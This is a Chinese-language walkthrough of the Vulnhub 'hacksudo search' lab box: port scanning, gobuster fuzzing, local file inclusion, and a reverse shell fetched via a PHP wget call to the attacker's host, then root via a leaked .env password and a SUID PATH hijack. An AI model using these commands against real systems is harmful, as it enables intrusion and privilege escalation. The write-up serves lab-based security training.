nmap扫描端口:
![https://s4.ax1x.com/2022/01/03/THl5SU.png](https://s4.ax1x.com/2022/01/03/THl5SU.png)
浏览器打开80端口:
![https://s4.ax1x.com/2022/01/03/THG63V.png](https://s4.ax1x.com/2022/01/03/THG63V.png)
页面只有一个搜索框,输入之后会跳转到搜索页面。
gobuster进行web页面路径爆破:
gobuster dir -e -w C:\Users\Administrator\Desktop\gobuster\dir.txt -u 192.168.0.18 | grep -v "403"
![https://s4.ax1x.com/2022/01/03/THlhWT.png](https://s4.ax1x.com/2022/01/03/THlhWT.png)
![https://s4.ax1x.com/2022/01/03/THloy4.png](https://s4.ax1x.com/2022/01/03/THloy4.png)
gobuster进行参数fuzz:
![https://s4.ax1x.com/2022/01/03/THlbwR.png](https://s4.ax1x.com/2022/01/03/THlbwR.png)
试着读取一下/etc/passwd文件:
![https://s4.ax1x.com/2022/01/03/THlTOJ.png](https://s4.ax1x.com/2022/01/03/THlTOJ.png)
包含shell.php:
使用包含着下载shell.php命令的exec.php执行下载命令,然后反弹。
<?php system('wget http://192.168.0.16:8000/shell.php'); ?>
![https://s4.ax1x.com/2022/01/03/THlHm9.png](https://s4.ax1x.com/2022/01/03/THlHm9.png)
由于无法上传文件,使用python搭建http服务下载shell.php就能反弹了。
#python快速开启http服务:
pyhton -m http.server 8000
#nc监听端口:
nc -lvvp 1234
先用me参数访问exec.php,等下载好shell.php之再访问,然后就可以用nc连接。
![https://s4.ax1x.com/2022/01/03/THlqT1.png](https://s4.ax1x.com/2022/01/03/THlqT1.png)
![https://s4.ax1x.com/2022/01/03/THlOFx.png](https://s4.ax1x.com/2022/01/03/THlOFx.png)
![https://s4.ax1x.com/2022/01/03/THlxSO.png](https://s4.ax1x.com/2022/01/03/THlxSO.png)
nc连接成功。
提权:
在/var/www/html下存在.env目录,其中的数据库密码MyD4dSuperH3r0!可以用于hacksudo用户登录。
![https://s4.ax1x.com/2022/01/03/THlzlD.png](https://s4.ax1x.com/2022/01/03/THlzlD.png)
![https://s4.ax1x.com/2022/01/03/TH1S6e.png](https://s4.ax1x.com/2022/01/03/TH1S6e.png)
查找SUID文件进行提权:
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
![https://s4.ax1x.com/2022/01/03/TH1Cmd.png](https://s4.ax1x.com/2022/01/03/TH1Cmd.png)
home目录下的searchinstall文件具有SUID权限。
![https://s4.ax1x.com/2022/01/03/TH1P0A.png](https://s4.ax1x.com/2022/01/03/TH1P0A.png)
#用bash命令替换install命令并替换环境变量,这样就可以用root权限执行bash命令.
echo "/bin/bash" > /tmp/install
chmod 777 install
export PATH=/tmp:$PATH
![https://s4.ax1x.com/2022/01/03/TH1kkt.png](https://s4.ax1x.com/2022/01/03/TH1kkt.png)
root.txt:
![https://s4.ax1x.com/2022/01/03/TH1iTI.png](https://s4.ax1x.com/2022/01/03/TH1iTI.png)
note.txt:
![https://s4.ax1x.com/2022/01/03/TH1AtP.png](https://s4.ax1x.com/2022/01/03/TH1AtP.png)
mysql登录一下:
![https://s4.ax1x.com/2022/01/03/TH1Eff.png](https://s4.ax1x.com/2022/01/03/TH1Eff.png)
search1.php
![https://s4.ax1x.com/2022/01/03/TH1e1S.png](https://s4.ax1x.com/2022/01/03/TH1e1S.png)
Vulnhub:hackdo_search下载链接:
gobuster链接:
https://github.com/OJ/gobuster